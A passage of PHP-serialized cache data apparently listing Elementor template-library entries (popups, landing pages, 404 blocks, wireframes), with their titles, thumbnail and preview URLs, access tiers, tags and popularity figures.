Gallery\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/20-Gallery-Architecture-Photography.jpg\";s:12:\"tmpl_created\";i:1638822115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/architecture-photography-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:52:\"[\"Architecture\",\"Gallery\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:231;a:19:{s:4:\"tmpl\";i:1015;s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:650;s:11:\"trend_index\";i:565;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:232;a:19:{s:4:\"tmpl\";i:923;s:2:\"id\";i:12229;s:5:\"title\";s:33:\"Slide In | Law Firm | Information\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/popup.png\";s:12:\"tmpl_created\";i:1572847842;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-law-firm-information/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:413;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:233;a:19:{s:4:\"tmpl\";i:1198;s:2:\"id\";i:18824;s:5:\"title\";s:33:\"Design School &#8211; Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1621336756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:234;a:19:{s:4:\"tmpl\";i:1236;s:2:\"id\";i:21259;s:5:\"title\";s:28:\"3D Designer &#8211; Projects\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/24-Projects-3D-Designer.jpg\";s:12:\"tmpl_created\";i:1638819185;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/3d-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"3D\",\"Creative Portfolio\",\"Design\",\"Designer\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:235;a:19:{s:4:\"tmpl\";i:1028;s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:559;s:11:\"trend_index\";i:284;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:236;a:19:{s:4:\"tmpl\";i:1197;s:2:\"id\";i:18819;s:5:\"title\";s:27:\"Dog Walker &#8211; Business\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Dog-Walker.png\";s:12:\"tmpl_created\";i:1621336601;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/dog-walker-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:41:\"[\"Business\",\"Dog\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:237;a:19:{s:4:\"tmpl\";i:1238;s:2:\"id\";i:21349;s:5:\"title\";s:29:\"Architecture &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/23-Projects-Architecture.jpg\";s:12:\"tmpl_created\";i:1638820870;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/architecture-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:70:\"[\"Architecture\",\"Creative\",\"Creative Portfolio\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:238;a:19:{s:4:\"tmpl\";i:1034;s:2:\"id\";i:15075;s:5:\"title\";s:34:\"Slide-In | Menu | Flooring Company\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp-1.png\";s:12:\"tmpl_created\";i:1597739605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/slide-in-menu-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:383;s:11:\"trend_index\";i:162;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:239;a:19:{s:4:\"tmpl\";i:1414;s:2:\"id\";i:24079;s:5:\"title\";s:32:\"Fashion Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Fashion-Shop.jpg\";s:12:\"tmpl_created\";i:1650988089;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/fashion-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Aesthetic\",\"Business\",\"Coming Soon\",\"Ecommerce\",\"Girly\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:240;a:19:{s:4:\"tmpl\";i:1195;s:2:\"id\";i:18761;s:5:\"title\";s:33:\"Fashion Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Fashion-Store.png\";s:12:\"tmpl_created\";i:1621336146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/fashion-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:56:\"[\"Coming Soon\",\"Fashion\",\"Landing Pages\",\"Shop\",\"store\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:241;a:19:{s:4:\"tmpl\";i:1153;s:2:\"id\";i:17060;s:5:\"title\";s:36:\"Private Tutor &#8211; Online Service\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Tutor-2.png\";s:12:\"tmpl_created\";i:1610631042;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/private-tutor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:64:\"[\"Education\",\"Landing Pages\",\"Online Service\",\"Teacher\",\"Tutor\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:780;s:11:\"trend_index\";i:628;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:242;a:19:{s:4:\"tmpl\";i:1430;s:2:\"id\";i:24434;s:5:\"title\";s:25:\"Wireframe &#8211; About 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-3.jpg\";s:12:\"tmpl_created\";i:1653988697;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:76:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:243;a:19:{s:4:\"tmpl\";i:1158;s:2:\"id\";i:17232;s:5:\"title\";s:33:\"Life Coach &#8211; Online Service\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Life-Coach.png\";s:12:\"tmpl_created\";i:1610902793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/life-coach-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:38:\"[\"Coach\",\"Landing Pages\",\"Life Coach\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:787;s:11:\"trend_index\";i:751;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:244;a:19:{s:4:\"tmpl\";i:1436;s:2:\"id\";i:24515;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3.jpg\";s:12:\"tmpl_created\";i:1653988946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:66:\"[\"Business\",\"Contact\",\"Footer\",\"Header\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:245;a:19:{s:4:\"tmpl\";i:875;s:2:\"id\";i:11241;s:5:\"title\";s:36:\"Classic | Digital Agency | Marketing\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/PopUp_small.jpg\";s:12:\"tmpl_created\";i:1564643043;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-digital-agency-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:362;s:11:\"trend_index\";i:315;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:246;a:19:{s:4:\"tmpl\";i:1146;s:2:\"id\";i:16932;s:5:\"title\";s:35:\"Finance Consulting &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Finance-Consulting.png\";s:12:\"tmpl_created\";i:1610532170;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/lp/finance-consulting-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:80:\"[\"Advisor\",\"Business\",\"Consulting\",\"Finance\",\"Investment\",\"Landing Pages\",\"Tax\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:790;s:11:\"trend_index\";i:630;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:247;a:19:{s:4:\"tmpl\";i:1429;s:2:\"id\";i:24421;s:5:\"title\";s:25:\"Wireframe &#8211; About 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-2.jpg\";s:12:\"tmpl_created\";i:1653988579;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:248;a:19:{s:4:\"tmpl\";i:674;s:2:\"id\";i:8505;s:5:\"title\";s:11:\"404 page 01\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/001.jpg\";s:12:\"tmpl_created\";i:1526415501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:222;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:249;a:19:{s:4:\"tmpl\";i:1136;s:2:\"id\";i:16721;s:5:\"title\";s:35:\"Dental &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Dental.jpg\";s:12:\"tmpl_created\";i:1610448567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/dental-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:44:\"[\"Dental\",\"Doctor\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:801;s:11:\"trend_index\";i:655;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:250;a:19:{s:4:\"tmpl\";i:1417;s:2:\"id\";i:24116;s:5:\"title\";s:32:\"Tech Company &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Tech-Company.jpg\";s:12:\"tmpl_created\";i:1650989265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/tech-company-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"Business\",\"Coding\",\"Coming Soon\",\"Computer\",\"Developer\",\"IT\",\"Services\",\"Technology\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:251;a:19:{s:4:\"tmpl\";i:675;s:2:\"id\";i:8511;s:5:\"title\";s:11:\"404 page 02\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/002.jpg\";s:12:\"tmpl_created\";i:1526415528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:347;s:11:\"trend_index\";i:155;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:252;a:19:{s:4:\"tmpl\";i:1161;s:2:\"id\";i:17269;s:5:\"title\";s:34:\"Electronics Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Electronic-Products.png\";s:12:\"tmpl_created\";i:1610903298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/electronics-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:800;s:11:\"trend_index\";i:556;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:253;a:19:{s:4:\"tmpl\";i:1220;s:2:\"id\";i:20908;s:5:\"title\";s:42:\"Packing &#038; Moving Company &#8211; Home\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/3-Home-Packing-Moving-Company.jpg\";s:12:\"tmpl_created\";i:1638786127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/packing-moving-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Movers\",\"Moving\",\"Storge\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:254;a:19:{s:4:\"tmpl\";i:1152;s:2:\"id\";i:17032;s:5:\"title\";s:42:\"Donate Computer &#8211; Social Involvement\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Donation-2.png\";s:12:\"tmpl_created\";i:1610630585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/donate-computer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:67:\"[\"Computer\",\"Donate\",\"Donation\",\"Kids\",\"Landing Pages\",\"Nonprofit\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:718;s:11:\"trend_index\";i:278;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:255;a:19:{s:4:\"tmpl\";i:672;s:2:\"id\";i:8512;s:5:\"title\";s:11:\"404 page 03\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/003.jpg\";s:12:\"tmpl_created\";i:1526415449;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:450;s:11:\"trend_index\";i:375;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:256;a:19:{s:4:\"tmpl\";i:1245;s:2:\"id\";i:21546;s:5:\"title\";s:28:\"Interior Design &#8211; Home\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/1-Home-Interior-Design-1.jpg\";s:12:\"tmpl_created\";i:1639046269;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/interior-design-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Design\",\"Form\",\"Furniture Design\",\"Interior Design\",\"Testimonial\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:257;a:19:{s:4:\"tmpl\";i:1135;s:2:\"id\";i:16684;s:5:\"title\";s:34:\"SaaS HR Management &#8211; Product\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_hr.png\";s:12:\"tmpl_created\";i:1609945486;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/saas-hr-management-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:39:\"[\"HR\",\"Landing Pages\",\"Product\",\"SaaS\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:708;s:11:\"trend_index\";i:292;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:258;a:19:{s:4:\"tmpl\";i:671;s:2:\"id\";i:8513;s:5:\"title\";s:11:\"404 page 04\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/004.jpg\";s:12:\"tmpl_created\";i:1526415417;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:420;s:11:\"trend_index\";i:176;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:259;a:19:{s:4:\"tmpl\";i:1249;s:2:\"id\";i:22137;s:5:\"title\";s:31:\"Design Blog &#8211; Coming 